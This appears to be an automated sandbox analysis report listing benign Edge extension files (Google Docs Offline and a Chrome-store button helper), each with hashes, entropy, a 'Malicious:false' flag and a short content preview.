                                                                                                                                                                                                                                                                                                                            SHA1:2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
                                                                                                                                                                                                                                                                                                                            SHA-256:F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
                                                                                                                                                                                                                                                                                                                            SHA-512:6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\zu\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):912
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.65963951143349
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
                                                                                                                                                                                                                                                                                                                            MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                                                                                                                                                                                                                                                                                                            SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                                                                                                                                                                                                                                                                                                            SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                                                                                                                                                                                                                                                                                                            SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_metadata\verified_contents.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):11406
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.745845607168024
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuH+svyw6r+cgTSJJT4LGkt:m8IEI4u8/EgG4
                                                                                                                                                                                                                                                                                                                            MD5:0A68C9539A188B8BB4F9573F2F2321D6
                                                                                                                                                                                                                                                                                                                            SHA1:E0F814FA4DCC04EDC6A5D39CBC1038979E88F0E5
                                                                                                                                                                                                                                                                                                                            SHA-256:39E6C25D096AFD156644F07586D85E37F1F7B3DA9B636471E8D15CEB14DB184F
                                                                                                                                                                                                                                                                                                                            SHA-512:13F133C173C6622B8E1B6F86A551CBC5B0B2446B3CF96E4AE8CA2646009B99E4A360C2DB3168CB94A488FAEBD215003DFA60D10150B7A85B5F8919900BD01CCC
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiIxMjgucG5nIiwicm9vdF9oYXNoIjoiZ2NWZy0xWWgySktRNVFtUmtjZGNmamU1dzVIc1JNN1ZCTmJyaHJ4eGZ5ZyJ9LHsicGF0aCI6Il9sb2NhbGVzL2FmL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJxaElnV3hDSFVNLWZvSmVFWWFiWWlCNU9nTm9ncUViWUpOcEFhZG5KR0VjIn0seyJwYXRoIjoiX2xvY2FsZXMvYW0vbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IlpPQWJ3cEs2THFGcGxYYjh4RVUyY0VkU0R1aVY0cERNN2lEQ1RKTTIyTzgifSx7InBhdGgiOiJfbG9jYWxlcy9hci9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiUjJVaEZjdTVFcEJfUUZtU19QeGstWWRrSVZqd3l6WEoxdURVZEMyRE9BSSJ9LHsicGF0aCI6Il9sb2NhbGVzL2F6L21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJZVVJ3Mmp4UU5Lem1TZkY0YS1xcTBzbFBSSFc4eUlXRGtMY2g4Ry0zdjJRIn0seyJwYXRoIjoiX2xvY2FsZXMvYmUvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IjNmRm9XYUZmUHJNelRXSkJsMXlqbUlyRDZ2dzlsa1VxdzZTdjAyUk1oVkEifSx7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiSXJ3M3RIem9xREx6bHdGa0hjTllOWFoyNmI0WWVwT2t4ZFN

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\dasherSettingSchema.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):854
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.284628987131403
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
                                                                                                                                                                                                                                                                                                                            MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                                                                                                                                                                                                                                                                                                            SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                                                                                                                                                                                                                                                                                                            SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                                                                                                                                                                                                                                                                                                            SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\manifest.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):2525
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.417954053901
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj17x9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/AP7xgiVb
                                                                                                                                                                                                                                                                                                                            MD5:5E425DC36364927B1348F6C48B68C948
                                                                                                                                                                                                                                                                                                                            SHA1:9E411B88453DEF3F7CFCB3EAA543C69AD832B82F
                                                                                                                                                                                                                                                                                                                            SHA-256:32D9C8DE71A40D71FC61AD52AA07E809D07DF57A2F4F7855E8FC300F87FFC642
                                                                                                                                                                                                                                                                                                                            SHA-512:C19217B9AF82C1EE1015D4DFC4234A5CE0A4E482430455ABAAFAE3F9C8AE0F7E5D2ED7727502760F1B0656F0A079CB23B132188AE425E001802738A91D8C5D79
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\offscreendocument.html

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):97
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.862433271815736
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
                                                                                                                                                                                                                                                                                                                            MD5:B747B5922A0BC74BBF0A9BC59DF7685F
                                                                                                                                                                                                                                                                                                                            SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
                                                                                                                                                                                                                                                                                                                            SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
                                                                                                                                                                                                                                                                                                                            SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\offscreendocument_main.js

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):122218
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.439997574414675
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:1536:naCwKqAbNBbV9HGsR43l9S6w3xu7gXMgaG0R6RxNbF4Ki3wqP+PrQY2PEtb1B:Jfcs1XMr2zbF4Ki+PkPEfB
                                                                                                                                                                                                                                                                                                                            MD5:67C4451398037DD1C497A1EA98227630
                                                                                                                                                                                                                                                                                                                            SHA1:F5BB00D46BCAB5A8A02E68E4895AEB6859B74AA8
                                                                                                                                                                                                                                                                                                                            SHA-256:59123D5A34A319791E90391FC55F0F4B8F5ABB6DB67353609DB25ACC3E99C166
                                                                                                                                                                                                                                                                                                                            SHA-512:17F35CE2A11C26168CC52C4AE2BEC548A1AEB1B1F9CB3475B0552BDE71CFE94C5C0C4F3F51267EF7C7D9B0E01E1D1259F48968E70EE1E905471BA0C76ECA81EA
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var ha=ea(this);function r(a,b){if(b)a:{var c=ha;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\page_embed_script.js

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):291
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.65176400421739
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
                                                                                                                                                                                                                                                                                                                            MD5:3AB0CD0F493B1B185B42AD38AE2DD572
                                                                                                                                                                                                                                                                                                                            SHA1:079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
                                                                                                                                                                                                                                                                                                                            SHA-256:73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
                                                                                                                                                                                                                                                                                                                            SHA-512:32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\service_worker_bin_prod.js

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):130866
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.425065147784983
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:1536:zKjBw7l0GLFqjLmqoTquyBQCGLu5fJDX5pwPGFSS2IH0dKxQ5SbNyO+DrxZlkaY8:XYQi3DX5WkfH0dKxdboDrNOdor
                                                                                                                                                                                                                                                                                                                            MD5:1A8A1F4E5BA291867D4FA8EF94243EFA
                                                                                                                                                                                                                                                                                                                            SHA1:B25076D2AE85BD5E4ABA935F758D5122CCB82C36
                                                                                                                                                                                                                                                                                                                            SHA-256:441385D13C00F82ABEEDD56EC9A7B2FE90658C9AACB7824DEA47BB46440C335B
                                                                                                                                                                                                                                                                                                                            SHA-512:F05668098B11C60D0DDC3555FCB51C3868BB07BA20597358EBA3FEED91E59F122E07ECB0BD06743461DFFF8981E3E75A53217713ABF2A78FB4F955641F63537C
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var fa=ea(this);function r(a,b){if(b)a:{var c=fa;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\ef377577-a577-4383-abae-014751f0def8.tmp

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):154477
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                                                                            MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                                                                            SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                                                                            SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                                                                            SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........%0............G.m.}...CG.....a.s.:.S..QiI.fT.k.MdOF.2....D...v`m...M.7'.R.d...8....2..~.<w8!.W..Sg.._A6.(.pC..w.=..!..7h!J...].....3......Kf..k...|....6./.p.....A....e.1.y.<~Mu..+(v8W........?=.V+.Gb&...u8)...=Qt...... ......x.}.f..&X.SN9e..L....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!....~..E...Au.C.q..y.?2An.a..Zn}. H~.vtgI...o.|.j.e....p.........".&...........Z]o.H..+..zF.......S.E}@.F..".P`...3......jW....H.H...:..8.......<...........Z.e.>..vV.......J.,/.X.....?.%.....6....m#.u].Z...[.s.M_...J.."9l..l...,|.....r...QC.....4:....wj.O...5....s.n.%.....y....c.....#F........)gv(..!S

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1855404220\CRX_INSTALL\_metadata\verified_contents.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):1753
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.8889033066924155
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                                                                                                                                                                                                                                                                                                            MD5:738E757B92939B24CDBBD0EFC2601315
                                                                                                                                                                                                                                                                                                                            SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                                                                                                                                                                                                                                                                                                            SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                                                                                                                                                                                                                                                                                                            SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "eyJpdGVtX2lkIjoiam1qZmxnanBjcGVwZWFmbW1nZHBma29na2doY3BpaGEiLCJpdGVtX3ZlcnNpb24iOiIxLjIuMSIsInByb3RvY29sX3ZlcnNpb24iOjEsImNvbnRlbnRfaGFzaGVzIjpbeyJmb3JtYXQiOiJ0cmVlaGFzaCIsImRpZ2VzdCI6InNoYTI1NiIsImJsb2NrX3NpemUiOjQwOTYsImhhc2hfYmxvY2tfc2l6ZSI6NDA5NiwiZmlsZXMiOlt7InBhdGgiOiJjb250ZW50LmpzIiwicm9vdF9oYXNoIjoiQS13R1JtV0VpM1lybmxQNktneUdrVWJ5Q0FoTG9JZnRRZGtHUnBEcnp1QSJ9LHsicGF0aCI6ImNvbnRlbnRfbmV3LmpzIiwicm9vdF9oYXNoIjoiVU00WVRBMHc5NFlqSHVzVVJaVTFlU2FBSjFXVENKcHhHQUtXMGxhcDIzUSJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJKNXYwVTkwRmN0ejBveWJMZmZuNm5TbHFLU0h2bHF2YkdWYW9FeWFOZU1zIn1dfV19",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1855404220\CRX_INSTALL\content.js

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):9815
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):6.1716321262973315
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
                                                                                                                                                                                                                                                                                                                            MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                                                                                                                                                                                                                                                                                                            SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                                                                                                                                                                                                                                                                                                            SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
                                                                                                                                                                                                                                                                                                                            SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1855404220\CRX_INSTALL\content_new.js

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):10388
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):6.174387413738973
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                                                                                                                                                                                                                                                                                                            MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                                                                                                                                                                                                                                                                                                            SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                                                                                                                                                                                                                                                                                                            SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                                                                                                                                                                                                                                                                                                            SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                                                                                                                                                                                                                                                                                                            Malicious:false
